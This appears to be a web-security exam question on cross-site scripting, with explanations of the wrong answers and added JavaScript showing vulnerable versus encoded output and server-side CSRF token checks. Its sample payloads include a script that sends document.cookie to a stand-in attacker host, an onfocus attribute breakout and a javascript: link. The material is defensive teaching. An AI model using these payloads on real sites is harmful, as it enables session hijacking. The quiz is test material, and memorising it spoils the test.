Which of the following flaws arise every time an application takes user-supplied data and sends it to a Web browser without first validating or encoding the content?
A.
Injection flaws
B.
Cookies
C.
One-click attacks
D.
XSS flaws
Explanation:
Cross-site scripting (XSS) flaws arise whenever an application takes user-supplied data and sends it to a Web browser without first validating or encoding the content. Attackers find these flaws in Web applications very frequently. An XSS flaw lets an attacker execute script in the victim's browser, in the security context of the vulnerable site, which allows him to hijack the user's session, deface the Web site, redirect the user to a malicious page, or deliver malware that steals data from the user.

Answer option A is incorrect. Injection flaws occur when user-supplied data is sent to an interpreter (a SQL database, an LDAP directory, an operating-system shell) as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data. SQL injection is the most common form and the usual way a Web application's database is attacked. Some references list HTML injection alongside SQL injection under injection flaws, and XSS can be viewed as injection into the browser's HTML interpreter, but the question describes data sent to a Web browser, which is the definition of XSS.
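To make the difference between "sent to the browser unencoded" and "encoded first" concrete, here is an added example in JavaScript; it is not part of the original question or its explanation. It reflects a search query into three output contexts and, going one step beyond the question's wording, shows that encoding must match the context: HTML encoding neutralizes the element-body and attribute cases, but a URL attribute additionally needs a scheme allowlist because "javascript:" is a perfectly valid encoded value. All function names, the three payloads, and the placeholder hosts (attacker.example, example.invalid, example.org) are this example's own.

```javascript
// Added example (not code from the original page): a search page that reflects
// the user's query, rendered unencoded (vulnerable) and encoded for each output
// context (hardened). All names and hosts here are this example's own.

// Characters that change meaning inside HTML text and quoted attribute values.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode a value for the HTML element-body and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed attacker inputs, one per output context.
const SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)';
const URL_PAYLOAD = "javascript:alert(document.domain)";

// VULNERABLE: user data is concatenated straight into the markup.
function renderVulnerable(query, link) {
  return [
    `<p>Results for: ${query}</p>`,
    `<input type="text" value="${query}">`,
    `<a href="${link}">source</a>`,
  ].join("\n");
}

// URL context: encoding alone is not enough, because "javascript:" is a valid
// attribute value. Allow only http(s) URLs; relative links resolve against a
// placeholder base (an assumption of this example); anything else becomes "#".
function safeHref(link) {
  try {
    const u = new URL(String(link), "https://example.invalid/");
    if (u.protocol === "http:" || u.protocol === "https:") return escapeHtml(u.href);
  } catch (_e) {
    // unparsable input falls through to the inert default
  }
  return "#";
}

// HARDENED: each value is encoded for the context it lands in.
function renderSafe(query, link) {
  const q = escapeHtml(query);
  return [
    `<p>Results for: ${q}</p>`,
    `<input type="text" value="${q}">`,
    `<a href="${safeHref(link)}">source</a>`,
  ].join("\n");
}

// Toy start-tag tokenizer that splits attributes the way a browser would
// (honouring quotes). It exists only to show what the browser will treat as
// a tag or attribute; it is not an XSS filter.
function listTags(html) {
  const tagRe = /<([a-zA-Z][\w-]*)((?:\s+[^\s=>"'\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>"']+))?)*)\s*\/?>/g;
  const attrRe = /([^\s=>"'\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+)))?/g;
  const tags = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = [];
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const value = [a[2], a[3], a[4]].find((v) => v !== undefined) || "";
      attrs.push({ name: a[1].toLowerCase(), value });
    }
    tags.push({ tag: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// True if the markup carries a <script> tag, an on* event handler, or a
// javascript: link, i.e. something the browser would execute.
function hasActiveContent(html) {
  return listTags(html).some(({ tag, attrs }) =>
    tag === "script" ||
    attrs.some(({ name, value }) =>
      name.startsWith("on") || (name === "href" && /^\s*javascript:/i.test(value))));
}
```

renderVulnerable(SCRIPT_PAYLOAD, URL_PAYLOAD) hands the browser a live script tag and a javascript: link; renderSafe with the same inputs yields only text, a harmless attribute value and an "#" link. hasActiveContent is there to make that visible; the real defence is the context-specific encoding in renderSafe. Marking the session cookie HttpOnly would keep document.cookie out of reach of a payload like SCRIPT_PAYLOAD, but it does not remove the XSS flaw itself.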
Answer option B is incorrect. Cookies are small collections of data stored on a client computer by a Web server. By themselves, cookies are not a source of insecurity, but the way they are used can be. Developers sometimes store passwords or other secrets in a cookie. A browser flaw could permit a site to read another site's cookies. Cookies containing session information could be stolen from a client computer, or through an XSS flaw, and used by an attacker to hijack the user's logon session. Cookies are also used to track a user's activity and can therefore leave a trail of the sites the user has visited. Users should block third-party cookies, use a secure browser, and apply patches and updates as they become available.
Answer option C is incorrect. Cross-site request forgery (CSRF), also known as a one-click attack or session riding, is a malicious exploit of a Web site whereby unauthorized commands are transmitted on behalf of a user that the Web site trusts. Unlike cross-site scripting, which exploits the trust a user has in a particular site, CSRF exploits the trust that a site has in the user's browser. The attack works by including a link or script in a page the victim views, which causes the browser to send a request to a site to which the user is known to have authenticated; the browser attaches the user's cookies, so the site treats the forged request as the user's own.
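The "trust that a site has in a user's browser" is easiest to see from the server's side, so here is an added JavaScript example, not part of the original explanation, showing a genuine form submission beside a one-click forgery as the server receives them, and the checks that tell them apart. The request and session objects are constructed for the example, the hosts bank.example and attacker.example are placeholders, the token generator assumes Node.js, and all function names are this example's own.

```javascript
// Added example (not code from the original page): how a server tells a
// CSRF / one-click request from a genuine one. Names are this example's own;
// the request and session objects below are constructed, not captured.

// Per-session anti-CSRF token, generated when the form page is rendered and
// embedded in the form as a hidden field. Uses Node's CSPRNG (assumes Node.js).
function issueCsrfToken(session) {
  const { randomBytes } = require("crypto");
  session.csrfToken = randomBytes(32).toString("hex");
  return session.csrfToken;
}

// Constant-time string comparison, so the token check does not leak how many
// leading characters of a guess were right.
function constantTimeEqual(a, b) {
  const x = String(a), y = String(b);
  let diff = x.length ^ y.length;
  for (let i = 0; i < Math.max(x.length, y.length); i++) {
    diff |= (x.charCodeAt(i) || 0) ^ (y.charCodeAt(i) || 0);
  }
  return diff === 0;
}

// Decide whether a state-changing POST may be honoured.
// request: { headers: { origin?: string, cookie: string }, body: { csrf_token?: string, ... } }
// session: the server-side session already looked up from the cookie.
function isTrustedStateChange(request, session, siteOrigin) {
  // The session cookie proves nothing on its own: the browser attaches it to a
  // request started from the attacker's page just as readily. That is the
  // trust CSRF exploits.
  // 1. When the browser sends an Origin header it must name our own site.
  const origin = request.headers.origin;
  if (origin !== undefined && origin !== siteOrigin) return false;
  // 2. The token bound to the session must be echoed in the body. The attacker's
  //    page cannot read it (same-origin policy), so it cannot forge it.
  const token = request.body && request.body.csrf_token;
  if (!session.csrfToken || !token) return false;
  return constantTimeEqual(token, session.csrfToken);
}

// Constructed messages. The victim is logged in at https://bank.example, so the
// browser sends the session cookie with every one of these requests.
const SESSION = { userId: 42, csrfToken: "a3f1".repeat(16) };

// Genuine form submission from the bank's own transfer page.
const GENUINE_REQUEST = {
  headers: { origin: "https://bank.example", cookie: "sid=S3CR3T" },
  body: { to: "alice", amount: "10", csrf_token: "a3f1".repeat(16) },
};

// One-click attack: an auto-submitting form hosted on https://attacker.example.
const FORGED_REQUEST = {
  headers: { origin: "https://attacker.example", cookie: "sid=S3CR3T" },
  body: { to: "mallory", amount: "10000" },
};

// The same forgery from a client that sends no Origin header at all.
const FORGED_REQUEST_NO_ORIGIN = {
  headers: { cookie: "sid=S3CR3T" },
  body: { to: "mallory", amount: "10000" },
};
```

Both forged requests carry the victim's valid session cookie, which is exactly why a cookie-only check would accept them; the Origin comparison rejects the first and the missing token rejects the second. The token check is the one that works regardless of which headers the client sends, so it is the primary control and the Origin check a cheap extra.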